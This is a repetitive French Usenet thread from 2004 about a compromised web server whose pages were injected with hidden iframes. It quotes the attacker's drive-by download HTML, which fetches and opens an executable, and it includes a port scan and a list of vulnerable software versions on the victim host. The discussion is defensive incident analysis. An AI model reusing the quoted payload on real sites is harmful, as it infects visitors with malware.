Le Tue, 30 Nov 2004 07:17:59 +0000, Xaero a écrit :
Lorsque je consulte mon site web ( http://www.xaero-method.com ) avant d'afficher la page , ie indique qu'il ouvre d'abord cette page : http://tbsoft.org/index.php ( puis redirigé sur tbsoft.org/indexold.html )
Je n'ai pas ce comportement.
quand je consulte un autre site ( au hasard google.fr ) , cela n'apparait pas
Strange... Ça me faisait penser à un spyware installé sur ta machine et qui te chargerait des bannières.
Sinon, quand je vais sur tbsfot.org, je tombe sur http://tbsoft.org/indexx.html, donc le code source est le suivant :
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <script language="javascript">function onDownloadDone(s) {document.frames["d"].document.location="/scripts/fr.exe";} </script> </head> <body> <IE:DOWNLOAD id="oDownload" style=""><iframe name="d"></iframe> <script language="javascript">oDownload.startDownload("/jsk.jsp", onDownloadDone);</script></IE:DOWNLOAD> </body> </html>
Examiner le contenu de http://tbsoft.org/jsk.jsp me semble tout approprié.
-- Bientôt, Apple ne va plus que fournir les plans sous microfilms coincés sur le proc : le but sera de les en déloger avant d'allumer la machine, sinon ça fond ! Comme à Fort Boyard... -+- SP in Guide du Macounet Pervers :The name is Bond, James Bond -+-
Le Tue, 30 Nov 2004 07:17:59 +0000, Xaero a écrit :
Lorsque je consulte mon site web ( http://www.xaero-method.com )
avant d'afficher la page , ie indique qu'il ouvre d'abord cette page :
http://tbsoft.org/index.php ( puis redirigé sur tbsoft.org/indexold.html )
Je n'ai pas ce comportement.
quand je consulte un autre site ( au hasard google.fr ) , cela n'apparait
pas
Strange... Ça me faisait penser à un spyware installé sur ta machine et
qui te chargerait des bannières.
Sinon, quand je vais sur tbsfot.org, je tombe sur
http://tbsoft.org/indexx.html, donc le code source est le suivant :
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script language="javascript">function onDownloadDone(s)
{document.frames["d"].document.location="/scripts/fr.exe";} </script>
</head>
<body>
<IE:DOWNLOAD id="oDownload" style=""><iframe name="d"></iframe>
<script language="javascript">oDownload.startDownload("/jsk.jsp",
onDownloadDone);</script></IE:DOWNLOAD> </body>
</html>
Examiner le contenu de http://tbsoft.org/jsk.jsp me semble tout approprié.
--
Bientôt, Apple ne va plus que fournir les plans sous microfilms coincés
sur le proc : le but sera de les en déloger avant d'allumer la machine,
sinon ça fond ! Comme à Fort Boyard...
-+- SP in Guide du Macounet Pervers :The name is Bond, James Bond -+-
Le Tue, 30 Nov 2004 07:17:59 +0000, Xaero a écrit :
Lorsque je consulte mon site web ( http://www.xaero-method.com ) avant d'afficher la page , ie indique qu'il ouvre d'abord cette page : http://tbsoft.org/index.php ( puis redirigé sur tbsoft.org/indexold.html )
Je n'ai pas ce comportement.
quand je consulte un autre site ( au hasard google.fr ) , cela n'apparait pas
Strange... Ça me faisait penser à un spyware installé sur ta machine et qui te chargerait des bannières.
Sinon, quand je vais sur tbsfot.org, je tombe sur http://tbsoft.org/indexx.html, donc le code source est le suivant :
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <script language="javascript">function onDownloadDone(s) {document.frames["d"].document.location="/scripts/fr.exe";} </script> </head> <body> <IE:DOWNLOAD id="oDownload" style=""><iframe name="d"></iframe> <script language="javascript">oDownload.startDownload("/jsk.jsp", onDownloadDone);</script></IE:DOWNLOAD> </body> </html>
Examiner le contenu de http://tbsoft.org/jsk.jsp me semble tout approprié.
-- Bientôt, Apple ne va plus que fournir les plans sous microfilms coincés sur le proc : le but sera de les en déloger avant d'allumer la machine, sinon ça fond ! Comme à Fort Boyard... -+- SP in Guide du Macounet Pervers :The name is Bond, James Bond -+-
Xaero
Cedric Blancher wrote:
Lorsque je consulte mon site web ( http://www.xaero-method.com ) avant d'afficher la page , ie indique qu'il ouvre d'abord cette page : http://tbsoft.org/index.php ( puis redirigé sur tbsoft.org/indexold.html )
Je n'ai pas ce comportement.
Oui , logique , je vais expliquer pourquoi plus loin ;)
quand je consulte un autre site ( au hasard google.fr ) , cela n'apparait pas
Strange... Ça me faisait penser à un spyware installé sur ta machine et qui te chargerait des bannières.
C'est ce à quoi j'ai pensé tout d'abord , c'est pour cela que j'ai consulté d'autre site pour etre sur que ca ne venait pas de moi mais j'ai du nouveau ;)
j'ai remarqué que j'avais été infecté par un troyen ( qui utilise la nouvelle faille de ie au niveau des iframe )
en examinant les pages du serveur , j'ai remarqué un autre detail , associé à chaque page , il y a une iframe invisible ( avec height=0 et width=0 ) qui pointe vers ... tdsoft.org ;)
ce qui m'inquiete c'est que toutes les pages php et html sans exceptions comportent cette iframe , ce qui me fait penser à un defaçage , donc il y a clairement un trou de sécu sur le serveur qui permet de modifier les pages !! ( pourtant toutes les pages du serveur sont chmodés pour permettre uniquement la modif quand on est root sur la machine )
La solution temporaire que j'ai trouvé est d'uploader les pages presentes sur mon dur qui ne comportent pas cette iframe , voila pourquoi il n'y a pas eu ce probleme sur la page principale puisque j'ai uploadé une ancienne page qui ne comportait pas d'iframe , mais il ya enormement de pages ... bref ca va me prendre un temps fou :/
Sinon, quand je vais sur tbsfot.org, je tombe sur http://tbsoft.org/indexx.html, donc le code source est le suivant :
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <script language="javascript">function onDownloadDone(s) {document.frames["d"].document.location="/scripts/fr.exe";} </script> </head> <body> <IE:DOWNLOAD id="oDownload" style=""><iframe name="d"></iframe> <script language="javascript">oDownload.startDownload("/jsk.jsp", onDownloadDone);</script></IE:DOWNLOAD> </body> </html>
Examiner le contenu de http://tbsoft.org/jsk.jsp me semble tout approprié.
Je pense en fait que le serveur se fait le relais indirect d'un virus ( troyen ) , je penche pour celui ci :
troyen qui utilise une faille d'internet explorer : http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?IDp65
ce que je ne comprends pas , c'est comment un troyen qui s'execute sur windows peut etre implanté sur le serveur en sachant que l'os est linux ou alors , on aurait juste modifié les pages du serveur à la volée uniquement pour infecter non pas le serveur mais les visiteurs en redirigeant les visiteurs vers ce site ( tbsoft ) .
le code javascript telechargerais donc le virus et si moi , je vois un autre code c'est que je suis infecté ( donc je n'ai plus besoin de telecharger à nouveau le virus ) ( probleme à mon niveau : secuser ne me detecte rien )
bref j'ai coupé apache en attendant , j'ai pas envie de me faire le relais d'un troyen ... je vais uploader les pages.
par contre pour eviter que ca ne se reproduise , qqun aurait une idée de comment modifier des pages à la volée comme ça , il y a un trou de sécu qqe part sur le serveur mais j'avoue que je vois pas où , les logs apache m'en apprendront peut etre plus ...
-- Xaero, Jeu en ligne Xm-jdr http://www.xaero-method.com/jdr
Cedric Blancher wrote:
Lorsque je consulte mon site web ( http://www.xaero-method.com )
avant d'afficher la page , ie indique qu'il ouvre d'abord cette page
: http://tbsoft.org/index.php ( puis redirigé sur
tbsoft.org/indexold.html )
Je n'ai pas ce comportement.
Oui , logique , je vais expliquer pourquoi plus loin ;)
quand je consulte un autre site ( au hasard google.fr ) , cela
n'apparait pas
Strange... Ça me faisait penser à un spyware installé sur ta machine
et qui te chargerait des bannières.
C'est ce à quoi j'ai pensé tout d'abord , c'est pour cela que j'ai consulté
d'autre site pour etre sur que ca ne venait pas de moi mais j'ai du nouveau
;)
j'ai remarqué que j'avais été infecté par un troyen ( qui utilise la
nouvelle faille de ie au niveau des iframe )
en examinant les pages du serveur , j'ai remarqué un autre detail , associé
à chaque page , il y a une iframe invisible ( avec height=0 et width=0 ) qui
pointe vers ... tdsoft.org ;)
ce qui m'inquiete c'est que toutes les pages php et html sans exceptions
comportent cette iframe , ce qui me fait penser à un defaçage , donc il y a
clairement un trou de sécu sur le serveur qui permet de modifier les pages
!! ( pourtant toutes les pages du serveur sont chmodés pour permettre
uniquement la modif quand on est root sur la machine )
La solution temporaire que j'ai trouvé est d'uploader les pages presentes
sur mon dur qui ne comportent pas cette iframe , voila pourquoi il n'y a pas
eu ce probleme sur la page principale puisque j'ai uploadé une ancienne page
qui ne comportait pas d'iframe , mais il ya enormement de pages ... bref ca
va me prendre un temps fou :/
Sinon, quand je vais sur tbsfot.org, je tombe sur
http://tbsoft.org/indexx.html, donc le code source est le suivant :
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script language="javascript">function onDownloadDone(s)
{document.frames["d"].document.location="/scripts/fr.exe";}
</script> </head>
<body>
<IE:DOWNLOAD id="oDownload" style=""><iframe name="d"></iframe>
<script language="javascript">oDownload.startDownload("/jsk.jsp",
onDownloadDone);</script></IE:DOWNLOAD> </body>
</html>
Examiner le contenu de http://tbsoft.org/jsk.jsp me semble tout
approprié.
Je pense en fait que le serveur se fait le relais indirect d'un virus (
troyen ) , je penche pour celui ci :
troyen qui utilise une faille d'internet explorer :
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?IDp65
ce que je ne comprends pas , c'est comment un troyen qui s'execute sur
windows peut etre implanté sur le serveur en sachant que l'os est linux
ou alors , on aurait juste modifié les pages du serveur à la volée
uniquement pour infecter non pas le serveur mais les visiteurs en
redirigeant les visiteurs vers ce site ( tbsoft ) .
le code javascript telechargerais donc le virus et si moi , je vois un autre
code c'est que je suis infecté ( donc je n'ai plus besoin de telecharger à
nouveau le virus ) ( probleme à mon niveau : secuser ne me detecte rien )
bref j'ai coupé apache en attendant , j'ai pas envie de me faire le relais
d'un troyen ... je vais uploader les pages.
par contre pour eviter que ca ne se reproduise , qqun aurait une idée de
comment modifier des pages à la volée comme ça , il y a un trou de sécu qqe
part sur le serveur mais j'avoue que je vois pas où , les logs apache m'en
apprendront peut etre plus ...
--
Xaero,
Jeu en ligne Xm-jdr
http://www.xaero-method.com/jdr
Lorsque je consulte mon site web ( http://www.xaero-method.com ) avant d'afficher la page , ie indique qu'il ouvre d'abord cette page : http://tbsoft.org/index.php ( puis redirigé sur tbsoft.org/indexold.html )
Je n'ai pas ce comportement.
Oui , logique , je vais expliquer pourquoi plus loin ;)
quand je consulte un autre site ( au hasard google.fr ) , cela n'apparait pas
Strange... Ça me faisait penser à un spyware installé sur ta machine et qui te chargerait des bannières.
C'est ce à quoi j'ai pensé tout d'abord , c'est pour cela que j'ai consulté d'autre site pour etre sur que ca ne venait pas de moi mais j'ai du nouveau ;)
j'ai remarqué que j'avais été infecté par un troyen ( qui utilise la nouvelle faille de ie au niveau des iframe )
en examinant les pages du serveur , j'ai remarqué un autre detail , associé à chaque page , il y a une iframe invisible ( avec height=0 et width=0 ) qui pointe vers ... tdsoft.org ;)
ce qui m'inquiete c'est que toutes les pages php et html sans exceptions comportent cette iframe , ce qui me fait penser à un defaçage , donc il y a clairement un trou de sécu sur le serveur qui permet de modifier les pages !! ( pourtant toutes les pages du serveur sont chmodés pour permettre uniquement la modif quand on est root sur la machine )
La solution temporaire que j'ai trouvé est d'uploader les pages presentes sur mon dur qui ne comportent pas cette iframe , voila pourquoi il n'y a pas eu ce probleme sur la page principale puisque j'ai uploadé une ancienne page qui ne comportait pas d'iframe , mais il ya enormement de pages ... bref ca va me prendre un temps fou :/
Sinon, quand je vais sur tbsfot.org, je tombe sur http://tbsoft.org/indexx.html, donc le code source est le suivant :
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <script language="javascript">function onDownloadDone(s) {document.frames["d"].document.location="/scripts/fr.exe";} </script> </head> <body> <IE:DOWNLOAD id="oDownload" style=""><iframe name="d"></iframe> <script language="javascript">oDownload.startDownload("/jsk.jsp", onDownloadDone);</script></IE:DOWNLOAD> </body> </html>
Examiner le contenu de http://tbsoft.org/jsk.jsp me semble tout approprié.
Je pense en fait que le serveur se fait le relais indirect d'un virus ( troyen ) , je penche pour celui ci :
troyen qui utilise une faille d'internet explorer : http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?IDp65
ce que je ne comprends pas , c'est comment un troyen qui s'execute sur windows peut etre implanté sur le serveur en sachant que l'os est linux ou alors , on aurait juste modifié les pages du serveur à la volée uniquement pour infecter non pas le serveur mais les visiteurs en redirigeant les visiteurs vers ce site ( tbsoft ) .
le code javascript telechargerais donc le virus et si moi , je vois un autre code c'est que je suis infecté ( donc je n'ai plus besoin de telecharger à nouveau le virus ) ( probleme à mon niveau : secuser ne me detecte rien )
bref j'ai coupé apache en attendant , j'ai pas envie de me faire le relais d'un troyen ... je vais uploader les pages.
par contre pour eviter que ca ne se reproduise , qqun aurait une idée de comment modifier des pages à la volée comme ça , il y a un trou de sécu qqe part sur le serveur mais j'avoue que je vois pas où , les logs apache m'en apprendront peut etre plus ...
-- Xaero, Jeu en ligne Xm-jdr http://www.xaero-method.com/jdr
Cedric Blancher
Le Tue, 30 Nov 2004 09:10:52 +0000, Xaero a écrit :
par contre pour eviter que ca ne se reproduise , qqun aurait une idée de comment modifier des pages à la volée comme ça , il y a un trou de sécu qqe part sur le serveur mais j'avoue que je vois pas où , les logs apache m'en apprendront peut etre plus ...
Déjà, juste une remarque comme ça, ton serveur Web n'a pas de reverse DNS. C'est cosmétique me diras-tu, mais dans l'absolu, c'est maaaal.
Sinon, quelques remarques diverses suite à des tests faits depuis mon dernier posts au p'tit déj...
Apache 1.3.29 n'est pas à jour, il y a 5 failles de sécurité corrigées depuis... Cf. :
http://www.apache.org/dist/httpd/CHANGES_1.3
phpBB 2.0.6 n'est pas à jour. Là encore, il y a pas mal de failles de sécurité corrigées dans les 2.0.7 et 2.0.8 par rapport à la 2.0.6. Je dois avouer que c'est amha la source probable de l'intrusion. Il faut vérifier les logs PHP. La BID SecurityFocus annonce une 20e de failles diverses (XSS, SQL injections, file injection, etc.)
PHP 4.3.4 n'est pas à jour, il y a aussi des failles corrigées depuis. La dernière version stable est la 4.3.9. Laisser traîner des choses comme ça n'est pas malin :
Your mail is being routed through Germany ... and they're censoring us.
Le Tue, 30 Nov 2004 09:10:52 +0000, Xaero a écrit :
par contre pour eviter que ca ne se reproduise , qqun aurait une idée de
comment modifier des pages à la volée comme ça , il y a un trou de sécu qqe
part sur le serveur mais j'avoue que je vois pas où , les logs apache m'en
apprendront peut etre plus ...
Déjà, juste une remarque comme ça, ton serveur Web n'a pas de reverse
DNS. C'est cosmétique me diras-tu, mais dans l'absolu, c'est maaaal.
Sinon, quelques remarques diverses suite à des tests faits depuis mon
dernier posts au p'tit déj...
Apache 1.3.29 n'est pas à jour, il y a 5 failles de sécurité
corrigées depuis... Cf. :
http://www.apache.org/dist/httpd/CHANGES_1.3
phpBB 2.0.6 n'est pas à jour. Là encore, il y a pas mal de failles de
sécurité corrigées dans les 2.0.7 et 2.0.8 par rapport à la 2.0.6. Je
dois avouer que c'est amha la source probable de l'intrusion. Il faut
vérifier les logs PHP. La BID SecurityFocus annonce une 20e de failles
diverses (XSS, SQL injections, file injection, etc.)
PHP 4.3.4 n'est pas à jour, il y a aussi des failles corrigées depuis.
La dernière version stable est la 4.3.9. Laisser traîner des choses
comme ça n'est pas malin :
Le Tue, 30 Nov 2004 09:10:52 +0000, Xaero a écrit :
par contre pour eviter que ca ne se reproduise , qqun aurait une idée de comment modifier des pages à la volée comme ça , il y a un trou de sécu qqe part sur le serveur mais j'avoue que je vois pas où , les logs apache m'en apprendront peut etre plus ...
Déjà, juste une remarque comme ça, ton serveur Web n'a pas de reverse DNS. C'est cosmétique me diras-tu, mais dans l'absolu, c'est maaaal.
Sinon, quelques remarques diverses suite à des tests faits depuis mon dernier posts au p'tit déj...
Apache 1.3.29 n'est pas à jour, il y a 5 failles de sécurité corrigées depuis... Cf. :
http://www.apache.org/dist/httpd/CHANGES_1.3
phpBB 2.0.6 n'est pas à jour. Là encore, il y a pas mal de failles de sécurité corrigées dans les 2.0.7 et 2.0.8 par rapport à la 2.0.6. Je dois avouer que c'est amha la source probable de l'intrusion. Il faut vérifier les logs PHP. La BID SecurityFocus annonce une 20e de failles diverses (XSS, SQL injections, file injection, etc.)
PHP 4.3.4 n'est pas à jour, il y a aussi des failles corrigées depuis. La dernière version stable est la 4.3.9. Laisser traîner des choses comme ça n'est pas malin :
Sinon, quelques remarques diverses suite à des tests faits depuis mon dernier posts au p'tit déj...
Apache 1.3.29 phpBB 2.0.6 PHP 4.3.4
Et il n'y a pas de problème avec le mysql 3.23.49 ?
JFB
-- Zombie processes haunting the computer
Cedric Blancher
Le Tue, 30 Nov 2004 12:00:48 +0000, Jean-Francois BILLAUD a écrit :
Et il n'y a pas de problème avec le mysql 3.23.49 ?
Oh que si ! Mais je n'avais pas regardé le MySQL, supposant naïvement qu'il ne serait pas accessible, et qu'à partir de là, il serait difficile de générer le comportement constaté à partir de MySQL. En fait, la machine est wide-open :
21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 135/tcp filtered msrpc 199/tcp open smux 445/tcp filtered microsoft-ds 3306/tcp open mysql 10000/tcp open snet-sensor-mgmt
Il y a quelques failles qui peuvent s'appliquer directement sur une connexion au port TCP/3306.
Sinon, on a un Sendmail 8.12.8 avec quelques failles aussi, un BIND 92.1 vulnérable également, un ProFTPd 1.2.9 (en configuration par défaut) pas à jour et un OpenSSH 3.5p1. avec des failles mineures. Je n'ai pas creusé le serveur POP, ni le portmapper qui exporte des services en UDP, ni le multiplex SNMP, ni le Webmin sur le port TCP/10000...
Bref, y'a du monde... Mais je reste partisan d'une intrusion via le phpBB.
-- Vire [] (com2 usb) [] probleme [] xpertplay [] resserve les adresse memoire [] reboot [] bios [] active [] windoz [] parametrage [] reservation de ressource [] reboot [] bios [] reset [] disable [] prie. -+- MK in Guide du linuxien pervers - "Solution à un problème Windows"
Le Tue, 30 Nov 2004 12:00:48 +0000, Jean-Francois BILLAUD a écrit :
Et il n'y a pas de problème avec le mysql 3.23.49 ?
Oh que si ! Mais je n'avais pas regardé le MySQL, supposant naïvement
qu'il ne serait pas accessible, et qu'à partir de là, il serait
difficile de générer le comportement constaté à partir de MySQL. En
fait, la machine est wide-open :
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
135/tcp filtered msrpc
199/tcp open smux
445/tcp filtered microsoft-ds
3306/tcp open mysql
10000/tcp open snet-sensor-mgmt
Il y a quelques failles qui peuvent s'appliquer directement sur une
connexion au port TCP/3306.
Sinon, on a un Sendmail 8.12.8 avec quelques failles aussi, un BIND 92.1
vulnérable également, un ProFTPd 1.2.9 (en configuration par défaut)
pas à jour et un OpenSSH 3.5p1. avec des failles mineures. Je n'ai pas
creusé le serveur POP, ni le portmapper qui exporte des services en UDP,
ni le multiplex SNMP, ni le Webmin sur le port TCP/10000...
Bref, y'a du monde... Mais je reste partisan d'une intrusion via le phpBB.
--
Vire [] (com2 usb) [] probleme [] xpertplay [] resserve les adresse
memoire [] reboot [] bios [] active [] windoz [] parametrage []
reservation de ressource [] reboot [] bios [] reset [] disable [] prie.
-+- MK in Guide du linuxien pervers - "Solution à un problème Windows"
Le Tue, 30 Nov 2004 12:00:48 +0000, Jean-Francois BILLAUD a écrit :
Et il n'y a pas de problème avec le mysql 3.23.49 ?
Oh que si ! Mais je n'avais pas regardé le MySQL, supposant naïvement qu'il ne serait pas accessible, et qu'à partir de là, il serait difficile de générer le comportement constaté à partir de MySQL. En fait, la machine est wide-open :
21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 135/tcp filtered msrpc 199/tcp open smux 445/tcp filtered microsoft-ds 3306/tcp open mysql 10000/tcp open snet-sensor-mgmt
Il y a quelques failles qui peuvent s'appliquer directement sur une connexion au port TCP/3306.
Sinon, on a un Sendmail 8.12.8 avec quelques failles aussi, un BIND 92.1 vulnérable également, un ProFTPd 1.2.9 (en configuration par défaut) pas à jour et un OpenSSH 3.5p1. avec des failles mineures. Je n'ai pas creusé le serveur POP, ni le portmapper qui exporte des services en UDP, ni le multiplex SNMP, ni le Webmin sur le port TCP/10000...
Bref, y'a du monde... Mais je reste partisan d'une intrusion via le phpBB.
-- Vire [] (com2 usb) [] probleme [] xpertplay [] resserve les adresse memoire [] reboot [] bios [] active [] windoz [] parametrage [] reservation de ressource [] reboot [] bios [] reset [] disable [] prie. -+- MK in Guide du linuxien pervers - "Solution à un problème Windows"
Xaero
Cedric Blancher wrote:
par contre pour eviter que ca ne se reproduise , qqun aurait une idée de comment modifier des pages à la volée comme ça , il y a un trou de sécu qqe part sur le serveur mais j'avoue que je vois pas où , les logs apache m'en apprendront peut etre plus ...
Déjà, juste une remarque comme ça, ton serveur Web n'a pas de reverse DNS. C'est cosmétique me diras-tu, mais dans l'absolu, c'est maaaal.
erf ... en fait ca consiste en quoi , j'avoue que au niveau des dns , j'ai pataugé et j'ai un peu laché l'affaire , à la base m'occuper d'un serveur , c'est pas du tout mon domaine donc j'ai un peu fait comme j'ai pu :/
Sinon, quelques remarques diverses suite à des tests faits depuis mon dernier posts au p'tit déj...
Apache 1.3.29 n'est pas à jour, il y a 5 failles de sécurité corrigées depuis... Cf. :
http://www.apache.org/dist/httpd/CHANGES_1.3
ok , c'est vrai qu'il faudrait que je mette à jour :(
phpBB 2.0.6 n'est pas à jour. Là encore, il y a pas mal de failles de sécurité corrigées dans les 2.0.7 et 2.0.8 par rapport à la 2.0.6. Je dois avouer que c'est amha la source probable de l'intrusion. Il faut vérifier les logs PHP. La BID SecurityFocus annonce une 20e de failles diverses (XSS, SQL injections, file injection, etc.)
bizarrement , les logs sont tres etrange , on dirait que la personne avait directement accé au serveur , cette personne a balancé ses wget sans probleme ( plus de 100 ) et sans qu'apache ne detecte aucune erreur , le premier wget est apparu comme ça à 23h47. petite question : est ce qu'une commande wget balancée en ssh avec accé root se retrouve dans le error_log ?
PHP 4.3.4 n'est pas à jour, il y a aussi des failles corrigées depuis. La dernière version stable est la 4.3.9. Laisser traîner des choses comme ça n'est pas malin :
-- Xaero, Jeu en ligne Xm-jdr http://www.xaero-method.com/jdr
Cedric Blancher wrote:
par contre pour eviter que ca ne se reproduise , qqun aurait une
idée de comment modifier des pages à la volée comme ça , il y a un
trou de sécu qqe part sur le serveur mais j'avoue que je vois pas où
, les logs apache m'en apprendront peut etre plus ...
Déjà, juste une remarque comme ça, ton serveur Web n'a pas de reverse
DNS. C'est cosmétique me diras-tu, mais dans l'absolu, c'est maaaal.
erf ... en fait ca consiste en quoi , j'avoue que au niveau des dns , j'ai
pataugé et j'ai un peu laché l'affaire , à la base m'occuper d'un serveur ,
c'est pas du tout mon domaine donc j'ai un peu fait comme j'ai pu :/
Sinon, quelques remarques diverses suite à des tests faits depuis mon
dernier posts au p'tit déj...
Apache 1.3.29 n'est pas à jour, il y a 5 failles de sécurité
corrigées depuis... Cf. :
http://www.apache.org/dist/httpd/CHANGES_1.3
ok , c'est vrai qu'il faudrait que je mette à jour :(
phpBB 2.0.6 n'est pas à jour. Là encore, il y a pas mal de failles de
sécurité corrigées dans les 2.0.7 et 2.0.8 par rapport à la 2.0.6. Je
dois avouer que c'est amha la source probable de l'intrusion. Il faut
vérifier les logs PHP. La BID SecurityFocus annonce une 20e de failles
diverses (XSS, SQL injections, file injection, etc.)
bizarrement , les logs sont tres etrange , on dirait que la personne avait
directement accé au serveur , cette personne a balancé ses wget sans
probleme ( plus de 100 ) et sans qu'apache ne detecte aucune erreur , le
premier wget est apparu comme ça à 23h47.
petite question : est ce qu'une commande wget balancée en ssh avec accé root
se retrouve dans le error_log ?
PHP 4.3.4 n'est pas à jour, il y a aussi des failles corrigées depuis.
La dernière version stable est la 4.3.9. Laisser traîner des choses
comme ça n'est pas malin :
par contre pour eviter que ca ne se reproduise , qqun aurait une idée de comment modifier des pages à la volée comme ça , il y a un trou de sécu qqe part sur le serveur mais j'avoue que je vois pas où , les logs apache m'en apprendront peut etre plus ...
Déjà, juste une remarque comme ça, ton serveur Web n'a pas de reverse DNS. C'est cosmétique me diras-tu, mais dans l'absolu, c'est maaaal.
erf ... en fait ca consiste en quoi , j'avoue que au niveau des dns , j'ai pataugé et j'ai un peu laché l'affaire , à la base m'occuper d'un serveur , c'est pas du tout mon domaine donc j'ai un peu fait comme j'ai pu :/
Sinon, quelques remarques diverses suite à des tests faits depuis mon dernier posts au p'tit déj...
Apache 1.3.29 n'est pas à jour, il y a 5 failles de sécurité corrigées depuis... Cf. :
http://www.apache.org/dist/httpd/CHANGES_1.3
ok , c'est vrai qu'il faudrait que je mette à jour :(
phpBB 2.0.6 n'est pas à jour. Là encore, il y a pas mal de failles de sécurité corrigées dans les 2.0.7 et 2.0.8 par rapport à la 2.0.6. Je dois avouer que c'est amha la source probable de l'intrusion. Il faut vérifier les logs PHP. La BID SecurityFocus annonce une 20e de failles diverses (XSS, SQL injections, file injection, etc.)
bizarrement , les logs sont tres etrange , on dirait que la personne avait directement accé au serveur , cette personne a balancé ses wget sans probleme ( plus de 100 ) et sans qu'apache ne detecte aucune erreur , le premier wget est apparu comme ça à 23h47. petite question : est ce qu'une commande wget balancée en ssh avec accé root se retrouve dans le error_log ?
PHP 4.3.4 n'est pas à jour, il y a aussi des failles corrigées depuis. La dernière version stable est la 4.3.9. Laisser traîner des choses comme ça n'est pas malin :
-- Xaero, Jeu en ligne Xm-jdr http://www.xaero-method.com/jdr
Xaero
Cedric Blancher wrote:
Et il n'y a pas de problème avec le mysql 3.23.49 ?
Oh que si ! Mais je n'avais pas regardé le MySQL, supposant naïvement qu'il ne serait pas accessible, et qu'à partir de là, il serait difficile de générer le comportement constaté à partir de MySQL. En fait, la machine est wide-open :
21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 135/tcp filtered msrpc 199/tcp open smux 445/tcp filtered microsoft-ds 3306/tcp open mysql 10000/tcp open snet-sensor-mgmt
Il y a quelques failles qui peuvent s'appliquer directement sur une connexion au port TCP/3306.
mais si je forme le port21 , comment accepter à mon ftp par exemple ? de meme pour le port 80 , 110,22 etc ... , si je les ferme , impossible d'avoir un accé aux services en ecoute sur ses ports depuis l'exterieur non ? y aurait il une solution ? ( je precise que je n'ai pas d'accé physique à la machine qui est sur paris )
Sinon, on a un Sendmail 8.12.8 avec quelques failles aussi, un BIND 92.1 vulnérable également, un ProFTPd 1.2.9 (en configuration par défaut) pas à jour et un OpenSSH 3.5p1. avec des failles mineures. Je n'ai pas creusé le serveur POP, ni le portmapper qui exporte des services en UDP, ni le multiplex SNMP, ni le Webmin sur le port TCP/10000...
Bref, y'a du monde... Mais je reste partisan d'une intrusion via le phpBB.
je vois ... par contre pour webmin , je l'ai mis à jour recemment et je suis sur d'avoir la derniere version stable.
en fait , c'est un peu un avertissement cette intrusion , je realise en consultant le script pl utilisé pour le defacage que la personne aurait pu tout effacer .. bref , si j'ai bien compris , je dois tout mettre à jour ...
cependant , le /tmp/ en 777 m'inquiete un peu , j'aimerais bien trouver un moyen pour qu'apache et mysql puisse ecrire dedans sans qu'il y ai necessairement un chmod en 777 , y aurai t'il une solution à ce niveau car le repertoire tmp a clairement joué un role dans l'attaque.
-- Xaero, Jeu en ligne Xm-jdr http://www.xaero-method.com/jdr
Cedric Blancher wrote:
Et il n'y a pas de problème avec le mysql 3.23.49 ?
Oh que si ! Mais je n'avais pas regardé le MySQL, supposant naïvement
qu'il ne serait pas accessible, et qu'à partir de là, il serait
difficile de générer le comportement constaté à partir de MySQL. En
fait, la machine est wide-open :
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
135/tcp filtered msrpc
199/tcp open smux
445/tcp filtered microsoft-ds
3306/tcp open mysql
10000/tcp open snet-sensor-mgmt
Il y a quelques failles qui peuvent s'appliquer directement sur une
connexion au port TCP/3306.
mais si je forme le port21 , comment accepter à mon ftp par exemple ?
de meme pour le port 80 , 110,22 etc ... , si je les ferme , impossible
d'avoir un accé aux services en ecoute sur ses ports depuis l'exterieur non
?
y aurait il une solution ?
( je precise que je n'ai pas d'accé physique à la machine qui est sur
paris )
Sinon, on a un Sendmail 8.12.8 avec quelques failles aussi, un BIND
92.1 vulnérable également, un ProFTPd 1.2.9 (en configuration par
défaut)
pas à jour et un OpenSSH 3.5p1. avec des failles mineures. Je n'ai pas
creusé le serveur POP, ni le portmapper qui exporte des services en
UDP, ni le multiplex SNMP, ni le Webmin sur le port TCP/10000...
Bref, y'a du monde... Mais je reste partisan d'une intrusion via le
phpBB.
je vois ... par contre pour webmin , je l'ai mis à jour recemment et je suis
sur d'avoir la derniere version stable.
en fait , c'est un peu un avertissement cette intrusion , je realise en
consultant le script pl utilisé pour le defacage que la personne aurait pu
tout effacer .. bref , si j'ai bien compris , je dois tout mettre à jour ...
cependant , le /tmp/ en 777 m'inquiete un peu , j'aimerais bien trouver un
moyen pour qu'apache et mysql puisse ecrire dedans sans qu'il y ai
necessairement un chmod en 777 , y aurai t'il une solution à ce niveau car
le repertoire tmp a clairement joué un role dans l'attaque.
--
Xaero,
Jeu en ligne Xm-jdr
http://www.xaero-method.com/jdr
Et il n'y a pas de problème avec le mysql 3.23.49 ?
Oh que si ! Mais je n'avais pas regardé le MySQL, supposant naïvement qu'il ne serait pas accessible, et qu'à partir de là, il serait difficile de générer le comportement constaté à partir de MySQL. En fait, la machine est wide-open :
21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 135/tcp filtered msrpc 199/tcp open smux 445/tcp filtered microsoft-ds 3306/tcp open mysql 10000/tcp open snet-sensor-mgmt
Il y a quelques failles qui peuvent s'appliquer directement sur une connexion au port TCP/3306.
